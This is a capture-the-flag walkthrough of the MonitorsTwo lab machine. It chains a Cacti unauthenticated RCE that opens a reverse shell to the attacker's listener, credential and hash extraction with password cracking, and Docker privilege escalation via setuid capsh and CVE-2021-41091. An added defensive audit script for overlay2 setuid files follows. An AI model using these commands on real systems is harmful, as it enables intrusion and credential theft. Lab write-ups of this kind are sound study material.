
MonitorsTwo Walkthrough

thejester
RaidForum.co
First we start with a rustscan scan to find open ports:
```
Open 10.10.11.211:22
Open 10.10.11.211:80
```

Two ports are open; visiting the web server shows a Cacti server. The Cacti version is shown in the application:
Version: 1.2.22

This is vulnerable to an unauthenticated RCE exploit: CVE-2022-46169.

Download and use the following script to get RCE: https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22

1. Open a netcat listener:
```
nc -lnvp 1234
```
2. Run the exploit:
```
python3 expl.py -u http://10.10.11.211/ --LHOST=<localip> --LPORT=1234
```

Now you have a shell as www-data. Reading the /var/www/html/include/config.php file, we can find the MySQL database login credentials, which are "root:root".

We can log in to the MySQL database to find 2 users with their hashes (I used chisel to create a reverse proxy and open the MySQL port locally):
```
Table: user_auth
admin:$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
marcus:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
```

Running JTR with rockyou.txt, we can crack marcus' password:
```
marcus:funkymonkey
```

These credentials also work with the SSH login.

Root
Now you have SSH'ed into the box as "marcus".

Reading marcus' mail, we find an admin explaining a few vulnerabilities:
```
cat /var/mail/marcus
```

The one we need to exploit to gain root access is CVE-2021-41091, which exploits the docker container running on the host.

But before we can use CVE-2021-41091, we first need to turn the /bin/bash file on the docker container into an SUID binary with `chmod u+s /bin/bash`.

To do this, gain access to the docker container with the Cacti exploit from above, find that the 'capsh' file is an SUID binary, and use it to gain root access on the docker container (see https://gtfobins.github.io/gtfobins/capsh/):
```
capsh --gid=0 --uid=0 --
```

Now add the SUID bit to the bash binary:
```
chmod u+s /bin/bash
```

Now we can use the CVE-2021-41091 exploit on the host machine: https://github.com/UncleJ4ck/CVE-2021-41091

This will exploit the docker container, and we can now run the /bin/bash binary from the container with -p (so it doesn't drop privileges):
```
/var/lib/docker/overlay2/<HASH>/merged/bin/bash -p
```

~ pwned ~
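A defender-side check, added here and not part of thejester's post or of Docker's own tooling: the root step above needs two things on the host at once, a setuid binary planted inside a container's filesystem and an overlay2 `merged` directory that unprivileged host users can traverse. The script below audits a Docker data root for both. The data root path, the `layer_*` directory names and the sample layout are constructed for the example; on a real host you would point `audit()` at `/var/lib/docker`.

```python
"""Audit a Docker data root for setuid files in overlay2 layers and loose permissions.

Added example, not from the walkthrough or from Docker. It flags the two host-side
conditions the escalation relies on: setuid/setgid files under overlay2/*/merged,
and a data root whose 'others' execute bit lets unprivileged users traverse it.
"""
import os
import stat
import tempfile
from pathlib import Path


def find_setuid_in_layers(data_root: Path) -> list:
    """Return (layer_id, relative_path) for every setuid/setgid regular file
    found under <data_root>/overlay2/<layer>/merged."""
    hits = []
    overlay = data_root / "overlay2"
    if not overlay.is_dir():
        return hits
    for layer in sorted(overlay.iterdir()):
        merged = layer / "merged"
        if not merged.is_dir():
            continue
        for root, _dirs, files in os.walk(merged):
            for name in files:
                p = Path(root) / name
                try:
                    st = p.lstat()  # lstat: do not follow symlinks out of the layer
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((layer.name, str(p.relative_to(merged))))
    return hits


def world_traversable(path: Path) -> bool:
    """True if 'others' hold the execute (traverse) bit on the directory."""
    return bool(path.stat().st_mode & stat.S_IXOTH)


def audit(data_root: Path) -> dict:
    """Combine both checks into one report."""
    return {
        "data_root_world_traversable": world_traversable(data_root),
        "setuid_files": find_setuid_in_layers(data_root),
    }


def build_sample(tmp: Path, weak: bool) -> Path:
    """Constructed overlay2 layout (hypothetical layer ids). With weak=True the
    data root is traversable and one layer carries a setuid bash; with weak=False
    the root is owner/group only and no setuid file exists."""
    root = tmp / "docker"
    for layer_id in ("layer_clean_0001", "layer_suid_0002"):
        bin_dir = root / "overlay2" / layer_id / "merged" / "bin"
        bin_dir.mkdir(parents=True)
        bash = bin_dir / "bash"
        bash.write_bytes(b"#!/bin/sh\n")  # write first: a later write would clear setuid
        plant = weak and layer_id == "layer_suid_0002"
        bash.chmod(0o4755 if plant else 0o755)
    root.chmod(0o711 if weak else 0o710)
    return root


def run_sample_audit(weak: bool) -> dict:
    """Build the constructed layout in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        return audit(build_sample(Path(d), weak))


if __name__ == "__main__":
    for label, weak in (("weak host", True), ("hardened host", False)):
        report = run_sample_audit(weak)
        print(f"[{label}] data root world-traversable: {report['data_root_world_traversable']}")
        for layer, rel in report["setuid_files"]:
            print(f"[{label}] setuid file in layer {layer}: {rel}")
```

Run as root on the real host so every layer is readable; a non-empty `setuid_files` list for a layer whose image never shipped a setuid shell, or `data_root_world_traversable` being true on a patched engine, is worth an incident ticket rather than a cleanup.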